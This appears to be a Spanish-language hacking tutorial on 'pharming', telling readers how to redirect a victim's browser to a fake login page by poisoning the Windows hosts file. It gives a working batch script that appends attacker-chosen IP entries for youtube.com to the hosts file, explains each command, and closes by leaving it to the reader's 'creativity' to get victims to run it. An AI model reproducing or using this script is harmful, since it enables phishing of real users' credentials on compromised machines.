1

Tutorial : Pharming
Sistema Operativo : Windows 98/XP/Vista/7
Tipo de archivo : PDF
Conocimientos necesarios : BATCH/CMD
Autor : Catemaco Rock (catemaco.rock@rocketmail.com)

Introducción:

El Pharming es una técnica hacker mediante la cual el usuario modifica los hosts de la computadora
víctima, mediante esta técnica los DNS son modificados en la misma computadora para que se dirijan
hacia IP’s distintas a las correspondientes.

La importancia de esta técnica reside en que es tan solo otra manera de facilitar el Phishing.

Ejemplo:

1.- Soy dueño de un host.

2.- En este host tengo un index que simula ser una página de Hotmail, pero este index solo roba los
datos de inicio de sesión.

3.- Mi Host tiene una dirección IP (xxx.xxx.xxx.xxx)

4.- Vulnero la PC de mi víctima, modifico los hosts e implanto la IP de mi host con el DNS de Hotmail.

5.- Cuando la víctima entre a Hotmail el dominio aparecerá como: www.hotmail.com ,pero estará
entrando a la ip de mi host (xxx.xxx.xxx.xxx)

6.- La víctima no sospechara de que es un sitio SCAM pues el dominio es el original.

Nota: En este tutorial se explicara el proceso de cómo modificar los hosts de una PC mediante un
archivo BATCH con privilegios de administrador. (Solo con privilegios de administrador funciona)

http://www.mayanteam.net
 2

Detalles:

1.- La localización del archivo depende del idioma y configuración de cada computadora pero
normalmente sigue el siguiente patrón: C:\Windows\System32\drivers\etc\hosts

2.- Para que funcione, se necesita ejecutar el batch con permisos de administrador.

Proceso:

Nota: Debido a que este tutorial solo explica el proceso de cómo modificar los hosts se usaran páginas
cualquiera para ejemplificar el proceso.

1.- Conocer la IP de nuestro HOST con el índex scam o cualquier host que queramos que reemplace la ip
original del dominio que modificaremos.

 Abrir CMD.
 Escribir “Ping” seguido del nombre del dominio de nuestro host.
 Copiar la IP que aparece.

2.- Saber que dominio queremos modificar (en nuestro caso será www.youtube.com).

3.- Abrir un block de notas.

 Escribimos los siguiente en el block de notas:

@echo off
echo 173.192.60.242 www.youtube.com >> %windir%\system32\drivers\etc\hosts
echo 173.192.60.242 youtube.com >> %windir%\system32\drivers\etc\hosts
echo 173.192.60.242 http://www.youtube.com >> %windir%\system32\drivers\etc\hosts
pause>nul

http://www.mayanteam.net
 3

 El comando “@echo off” hace que a la hora de ejecutarse el batch solo se muestren los
resultados y no los comandos.
 “echo” está poniendo los datos que le siguen (ip + dominio)
 “>>” está dirigiendo la edición a un archivo especifico del computador.
 “%windir%” representa el directorio de Windows en cualquier PC.
 Se repite 3 veces, modificando el subdominio. (para que de cualquier forma la victima entre a la
ip ya mencionada)
 “Pause>nul” simplemente para la acción y el “nul” esconde el mensaje nato del comando
“Pause”

4.- Salvar el archivo como sea pero que la extensión sea “.bat”

5.- Ejecutar el archivo como administrador y veamos lo que sucede:

De su creatividad dependerá como hacer que la victima ejecute el archivo, espero que les haya servido.

http://www.mayanteam.net